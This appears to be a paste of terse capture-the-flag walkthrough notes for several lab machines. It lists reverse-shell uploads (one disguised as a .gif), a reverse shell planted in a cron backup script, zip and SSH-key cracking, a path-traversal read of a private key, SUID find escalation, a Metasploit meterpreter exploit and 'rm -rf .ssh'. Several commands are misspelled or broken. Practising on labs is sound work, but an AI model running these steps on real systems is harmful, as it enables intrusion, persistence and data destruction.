Untitled

mail@pastecode.io avatar
unknown
plain_text
a year ago
1.9 kB
4
Indexable
Never
H1: easy
1-gobustere dir -u http://ip -w /usr/share/wordlists/dirbuster/<listname>
2- go to port 8002
3-php reverse shell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
4-after get the revse shell go to /home/serv3/backups
5-cat backup.sh
6- chmod -R a+rwX backup.sh
7-listen to rev shell and wait  then 
go to revshells.com and put python#3 2 reverse shell inside the backup
------------------------------------------------------------------------
Hogwarts
1-nmap -sC -sV -A -p- ip -oN -vv
2- ftp 10.10.160.93 -p 7259, user is anonymous
3- get .IamHidden
4-cd ...
5- get GoAway.exe
6- cd ...
ls -la
get the files
7-exit ftp
8-unzip .I_saved_it_harry.zip
9- fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt .Isaved .I_saved_it_harry.zip
unzip file , pass is qwer1234
cd boot
cat .pass
ssh with creds:
ssh neville@ip -p 9075
find / type -f -perm -4000 2>/dev/null
go to:https://gtfobins.github.io/
ip netns add foo
ip netns add foo
#whoami? roooot
-----------------------------------------------------
carrange:
nmap -sC -sv -p 82 ip
get revshell
mv revshell.php to bbsi.gif
nc -lnvp port
uploade the revshell
go to ip/82/images
cd /var/www/html/web1
strings web.db  
echo "the base64" | base64 -d
ssh bobba@
find / -perm /4000 2>dev/null
you can run find as root
find . -exec /bin/sh \; -quit

chmod 700 to files
cd /home/duku
rm -rf .ssh
-------------------------------
lion:
go to http://machine_ip:5555/?page=../../../home/gloria/.ssh/id_rsa
ssh2jpohn id_rsa > john
john -w=/usr/share/wordlists/rockyou.txt john
ssh -i id_rsa 1337 gloria@ip
another path
msfconsole
searchsolit nostromo 1.9.6
use 0
set rport 8080
set rhost machine ip
check
set payload /linux/x86/meterpreter/reverse_tcp
set lhost tun0
explit
/usr/bin/tmux -S /.dev/session
---------------------------------
Hackers:
ftp 10.10.166.184
get note